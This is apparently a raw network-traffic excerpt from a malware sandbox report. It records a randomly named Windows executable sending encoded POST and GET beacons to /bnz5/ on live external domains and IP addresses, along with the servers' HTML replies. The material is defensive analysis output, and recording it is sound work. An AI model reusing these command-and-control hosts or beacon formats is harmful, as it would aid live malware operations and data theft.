                                                                                                      31192.168.2.549750134.122.178.172802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:24.563424110 CEST1737OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.66bm99.shop
                                                                                                      Referer: http://www.66bm99.shop/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 4d 4e 34 74 64 68 64 73 62 63 4e 37 73 35 6c 4f 4e 6f 47 6f 67 4a 70 57 70 71 6a 6d 65 6c 73 64 31 54 4e 45 6b 74 49 5a 63 66 54 78 65 72 57 30 51 63 69 78 75 35 6e 32 4c 6e 6b 55 73 77 36 78 56 48 7a 68 51 70 33 35 2f 78 53 43 4b 77 4f 37 79 6b 6d 50 63 75 62 41 61 6c 6e 76 4c 61 33 7a 39 35 30 78 71 44 54 67 59 51 67 77 63 79 6f 35 61 59 37 34 45 4d 6f 38 7a 55 75 6c 71 62 38 76 71 6f 68 58 49 72 34 45 62 2f 74 56 64 4e 34 69 43 4e 52 4c 34 69 59 46 4d 56 6e 62 53 4c 5a 48 63 61 7a 39 73 33 38 56 47 6a 63 2b 69 50 59 63 34 35 38 55 6b 70 31 66 71 48 42 61 31 67 53 67 4d 6b 6c 30 66 67 35 37 37 35 71 58 30 79 4d 6d 34 38 69 75 69 37 62 6c 55 71 32 4f 47 4f 48 71 69 50 4b 56 64 54 4d 71 5a 37 6a 56 65 35 69 63 79 74 30 72 57 68 2f 59 79 45 4e 52 48 76 34 64 6c 7a 30 41 79 64 31 32 42 63 48 7a 2f 6b 73 41 6a 46 6e 4c 66 42 7a 37 59 51 7a 34 74 47 53 75 66 73 32 73 48 62 76 65 45 57 5a 41 66 62 4c 53 33 6e 49 4a 64 44 41 45 32 6c 50 6a 4a 52 4b 31 45 76 2f 6a 32 74 57 54 4f 46 33 72 4a 62 52 35 2f 32 6a 68 4f 34 6e 57 5a 63 69 45 58 33 45 48 61 53 35 72 4e 43 73 46 75 45 77 74 51 6e 48 50 65 63 48 48 49 6a 62 47 58 32 33 43 49 31 79 56 59 44 5a 65 73 64 62 61 64 51 6b 67 72 6d 4c 71 37 67 62 5a 76 4a 36 56 51 4b 2b 55 44 5a 49 44 42 33 6a 31 52 33 6f 75 46 49 43 73 78 6a 46 33 75 43 52 75 6b 79 4c 47 44 42 7a 78 68 46 43 49 2b 73 6e 33 58 4c 77 53 2f 54 47 53 70 4b 6f 57 4a 31 76 55 37 2b 43 4b 31 43 53 6b 54 51 79 2b 49 5a 6e 4a 30 71 73 5a 72 69 63 67 44 58 50 4f 41 35 4c 4e 2f 56 49 65 35 69 67 49 56 48 7a 69 38 51 58 64 41 31 61 61 77 67 55 54 63 67 31 52 4d 62 64 6d 55 66 4a 6e 43 76 30 58 52 74 63 79 36 32 37 36 50 31 47 49 33 4b 68 67 57 45 47 77 70 4b 76 4c 52 62 4e 2f 37 38 6a 44 35 76 6b 32 6e 79 31 6a 72 51 57 4d 43 50 7a 57 45 56 69 50 31 43 72 76 76 72 50 47 56 30 49 39 4b 4a 61 66 66 76 6c 43 36 71 43 79 74 4b 44 2f 6e 7a 49 58 2b 53 62 31 58 33 5a 66 65 2f 73 54 61 72 65 57 74 64 43 50 4c 34 42 64 6f 63 30 69 32 68 75 55 4e 62 76 56 76 7a 58 63 52 62 57 32 70 44 4d 51 49 43 77 39 46 5a 74 62 75 34 54 73 38 2b 30 4c 4e 52 67 4c 73 45 50 6a 73 63 35 51 50 71 37 73 50 71 68 37 63 66 2b 6b 42 46 6f 2b 65 42 6b 55 6d 41 49 59 77 59 59 38 42 58 66 36 43 52 49 6c 34 4b 6e 51 4a 77 32 4d 6e 6d 45 76 69 55 69 50 58 68 48 6f 70 2b 49 55 61 52 70 36 49 6c 51 41 75 42 53 56 6f 41 58 62 4c 6b 4e 32 6f 33 43 79 44 74 66 35 75 33 50 54 42 39 38 64 59 73 33 47 34 73 58 42 52 42 63 7a 42 2b 37 70 44 4e 43 37 4d 4b 56 7a 6b 37 51 57 57 61 6c 52 70 74 38 42 59 47 6d 65 33 4e 32 74 58 4b 2b 55 53 2f 54 39 56 73 6e 4d 48 6c 65 70 56 32 34 63 74 4d 7a 69 67 67 4d 48 33 54 57 76 6c 2f 32 46 35 76 68 6c 45 6a 77 4d 2b 66 71 2b 72 4a 50 74 77 4f 62 48 7a 50 65 68 37 70 4d 72 46 37 74 4e 37 63 67 52 6d 4f 73 74 48 74 79 68 39 6f 44 33 34 4e 32 48 32 73 6e 30 56 38 69 52 49 42 65 2f 58 65 6a 30 32 69 79 7a 77 63 52 72 39 4a 67 37 69 66 43 47 36 50 74 64 75 6f 58 70 6f 73 66 2b 64 70 47 37 71 76 46 6b 37 59 76 4f 50 45 65 71 4b 66 2f 48 2b 4a 77 6c 71 4b 71 31 70 4e 4f 68 64 59 31 71 6d 75 4c 2f 78 33 75 63 73 6c 4c 58 49 4d 58 36 79 6e 32 69 6a 42 6c 45 4d 73 49 41 54 46 6e 77 35 76 52 42 2b 6e 6b 50 7a 57 51 2b 44 65 4a 77 65 59 58 49 42 49 6d 46 45 6d 68 2f 78 52 59 42 4e 7a 45 73 30 45 7a 71 38 6d 61 48 34 76 74 34 5a 53 48 35 48 75 4b 4c 75 71 43 73 62 4e 43 51 61 4c 74 42 56 50 4a 61 53 53 4b 4d 72 62 71 2b 61 41 2b 6a 50 44 65 31 37 6f 6f 7a 30 55 32 6e 77 75 6d 4a 30 50 52 32 37 6e 4d 62 4c 35 42 50 4d 6d 59 2b 43 38 67 4f 50 69 33 37 64 6c 35 44 68 78 71 78 35 64 69 53 4a 44 4b 61 38 41 41 75 34 70 36 62 7a 71 33 6c 69 42 32 71 77 50 67 6d 68 41 4a 53 32 64 65 53 79 66 55 43 53 65 6e 61 6a 6f 6e 4e 35 75 4a 6a 42 54 46 47 33 4f 69 51 4f 41 3d 3d
                                                                                                      Data Ascii: gr=MN4tdhdsbcN7s5lONoGogJpWpqjmelsd1TNEktIZcfTxerW0Qcixu5n2LnkUsw6xVHzhQp35/xSCKwO7ykmPcubAalnvLa3z950xqDTgYQgwcyo5aY74EMo8zUulqb8vqohXIr4Eb/tVdN4iCNRL4iYFMVnbSLZHcaz9s38VGjc+iPYc458Ukp1fqHBa1gSgMkl0fg5775qX0yMm48iui7blUq2OGOHqiPKVdTMqZ7jVe5icyt0rWh/YyENRHv4dlz0Ayd12BcHz/ksAjFnLfBz7YQz4tGSufs2sHbveEWZAfbLS3nIJdDAE2lPjJRK1Ev/j2tWTOF3rJbR5/2jhO4nWZciEX3EHaS5rNCsFuEwtQnHPecHHIjbGX23CI1yVYDZesdbadQkgrmLq7gbZvJ6VQK+UDZIDB3j1R3ouFICsxjF3uCRukyLGDBzxhFCI+sn3XLwS/TGSpKoWJ1vU7+CK1CSkTQy+IZnJ0qsZricgDXPOA5LN/VIe5igIVHzi8QXdA1aawgUTcg1RMbdmUfJnCv0XRtcy6276P1GI3KhgWEGwpKvLRbN/78jD5vk2ny1jrQWMCPzWEViP1CrvvrPGV0I9KJaffvlC6qCytKD/nzIX+Sb1X3Zfe/sTareWtdCPL4Bdoc0i2huUNbvVvzXcRbW2pDMQICw9FZtbu4Ts8+0LNRgLsEPjsc5QPq7sPqh7cf+kBFo+eBkUmAIYwYY8BXf6CRIl4KnQJw2MnmEviUiPXhHop+IUaRp6IlQAuBSVoAXbLkN2o3CyDtf5u3PTB98dYs3G4sXBRBczB+7pDNC7MKVzk7QWWalRpt8BYGme3N2tXK+US/T9VsnMHlepV24ctMziggMH3TWvl/2F5vhlEjwM+fq+rJPtwObHzPeh7pMrF7tN7cgRmOstHtyh9oD34N2H2sn0V8iRIBe/Xej02iyzwcRr9Jg7ifCG6PtduoXposf+dpG7qvFk7YvOPEeqKf/H+JwlqKq1pNOhdY1qmuL/x3ucslLXIMX6yn2ijBlEMsIATFnw5vRB+nkPzWQ+DeJweYXIBImFEmh/xRYBNzEs0Ezq8maH4vt4ZSH5HuKLuqCsbNCQaLtBVPJaSSKMrbq+aA+jPDe17ooz0U2nwumJ0PR27nMbL5BPMmY+C8gOPi37dl5Dhxqx5diSJDKa8AAu4p6bzq3liB2qwPgmhAJS2deSyfUCSenajonN5uJjBTFG3OiQOA==
                                                                                                      Apr 16, 2024 12:01:24.930212021 CEST748INHTTP/1.1 405 Not Allowed
                                                                                                      Date: Tue, 16 Apr 2024 10:01:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
                                                                                                      Data Raw: 32 32 63 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 22c<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      32192.168.2.549751134.122.178.172802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:27.434969902 CEST447OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=BPQNeXp4G99ixa42Ae2HhZRkmtmfIWoN8C4XxZZLRtTgWub9dK20l7PCUAY7izqtYkjPPbLJsAPTHyCf3Tn8bJnCF1PYC6i+wP1GhXiXOwtWSBMDP4vgP+g0mku5o7pd9Q== HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:01:27.806138992 CEST1289INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
                                                                                                      Data Raw: 35 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 20 64 61 74 61 2d 62 75 69 6c 64 74 69 6d 65 3d 22 34 2f 31 2f 32 30 32 34 2c 20 32 32 3a 32 37 3a 30 35 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6e 65 78 74 2d 66 6f 6e 74 2d 70 72 65 63 6f 6e 6e 65 63 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 63 65 2d 72 65 6e 64 65 72 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 68 2d 43 4e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 66 75 6c 6c 73 63 72 65 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 78 35 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6f 72 74 72 61 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 74 72 61 6e 73 6c 61 74 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 73 63 72 65 65 6e 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6f 72 74 72 61 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2e 63 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: 5b4<!DOCTYPE html><html lang="zh-CN" data-buildtime="4/1/2024, 22:27:05"> <head> <meta charset="utf-8"> <title></title> <meta name="next-font-preconnect"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="Content-Language" content="zh-CN"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="theme-color" content="#fff"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-touch-fullscreen" content="yes"> <meta name="referrer" content="origin"> <meta name="x5-orientation" content="portrait"> <meta name="google" content="notranslate"> <meta name="screen-orientation" content="portrait"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover"> ... --> <style> .con { width: 100%; height: 100%;
                                                                                                      Apr 16, 2024 12:01:27.806159973 CEST427INData Raw: 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 63 6d 73 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: background: var(--cms-primary-background-color); position: fixed; left: 0; top: 0; display: flex; justify-content: center; align-items: center; } .loading { display: block;
                                                                                                      Apr 16, 2024 12:01:27.806479931 CEST1289INData Raw: 31 39 38 36 0d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 61 64 69 6e 67 3a 62 65 66 6f 72 65 2c 0a 20 20 20 20 20 20 2e 6c 6f 61 64 69 6e 67 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f
                                                                                                      Data Ascii: 1986 } .loading:before, .loading:after { position: absolute; width: 6px; height: 10px; content: ""; background-color: var(--cms-primary-color); } .loading:before {
                                                                                                      Apr 16, 2024 12:01:27.806552887 CEST1289INData Raw: 39 39 39 39 39 39 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 69 6d 67 5b 73 72 63 3d 22 22 5d 2c 0a 20 20 20 20 20 20 69 6d 67 3a 6e 6f 74 28 5b 73 72 63 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 6f 70 61 63 69
                                                                                                      Data Ascii: 999999 !important; } img[src=""], img:not([src]) { opacity: 0; } .geetest_popup_ghost { width: 100%; height: calc(100vh); } </style> <meta name="keywords" content=""> <met
                                                                                                      Apr 16, 2024 12:01:27.806570053 CEST1289INData Raw: 2c 22 61 6e 69 6d 61 74 69 6f 6e 22 3a 22 63 61 73 69 6e 6f 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 e4 bd 93 e8 82 b2 22 2c 22 70 61 74 68 22 3a 22 2f 73 70 6f 72 74 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 e6 b4 bb e5 8a a8 22 2c 22 70 61 74 68 22 3a 22
                                                                                                      Data Ascii: ,"animation":"casino"},{"name":"","path":"/sport"},{"name":"","path":"/activity"},{"name":"","path":"/customer"},{"name":"","path":"/account","animation":"mine"}],"mobileMineSwitchList":["grxx","grzl","wdxx","zjmx","czd
                                                                                                      Apr 16, 2024 12:01:27.806586981 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 20 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 73 74 61 72
                                                                                                      Data Ascii: var o = 0; document.documentElement.addEventListener("touchstart", function (n) { 1 < n.touches.length && n.preventDefault(); }); document.documentElement.addEventListener("touchend", function
                                                                                                      Apr 16, 2024 12:01:27.806603909 CEST1289INData Raw: 72 73 2e 63 66 30 35 35 61 36 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 2f 6a 73 2f 63 6d 73 2d 73 70 6f 72 74 73 2e 32 35 66 34 39 31 35 66 2e 6a 73 22 3e 3c 2f
                                                                                                      Data Ascii: rs.cf055a64.js"></script><script defer="defer" src="/js/cms-sports.25f4915f.js"></script><script defer="defer" src="/js/index.6ea0f2b0.js"></script><link href="/css/chunk-vendors.4f666f70.css" rel="stylesheet"><link href="/css/cms-sports.5951e
                                                                                                      Apr 16, 2024 12:01:27.806622982 CEST102INData Raw: 65 72 48 54 4d 4c 20 3d 20 69 74 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 6c 65 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 20
                                                                                                      Data Ascii: erHTML = item; } document.body.appendChild(ele); }); } }</script>0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      33192.168.2.54975237.61.232.138802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:33.907092094 CEST727OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.wedgetechflash.co.ke
                                                                                                      Referer: http://www.wedgetechflash.co.ke/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 34 68 79 6b 6b 67 43 4d 50 5a 6c 54 7a 47 74 69 48 32 6a 76 44 5a 79 53 69 42 62 6b 79 2f 47 44 58 4d 61 73 37 31 5a 6f 4d 6a 55 59 66 43 34 31 31 51 56 61 2f 6c 35 57 6c 72 77 36 69 71 66 68 41 7a 44 4d 42 4b 47 70 54 76 58 6a 4b 5a 36 44 4c 46 43 33 49 34 4d 67 4a 75 48 6f 35 79 64 6f 52 56 4a 34 6e 74 62 68 34 59 52 42 62 45 66 4e 78 57 63 4d 4f 6e 68 49 56 73 77 43 32 41 38 65 43 48 69 47 73 62 61 44 48 4c 48 61 63 4f 4d 77 6c 62 58 6c 6f 73 6b 75 36 63 54 4c 2f 56 67 65 67 65 62 49 4f 48 70 2f 30 73 31 51 2f 36 69 65 56 50 66 77 41 63 33 75 49 41 75 4b 4f 4f 6b 46 73 56 35 30 6a 64 6b 3d
                                                                                                      Data Ascii: gr=4hykkgCMPZlTzGtiH2jvDZySiBbky/GDXMas71ZoMjUYfC411QVa/l5Wlrw6iqfhAzDMBKGpTvXjKZ6DLFC3I4MgJuHo5ydoRVJ4ntbh4YRBbEfNxWcMOnhIVswC2A8eCHiGsbaDHLHacOMwlbXlosku6cTL/VgegebIOHp/0s1Q/6ieVPfwAc3uIAuKOOkFsV50jdk=
                                                                                                      Apr 16, 2024 12:01:36.347651005 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:34 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 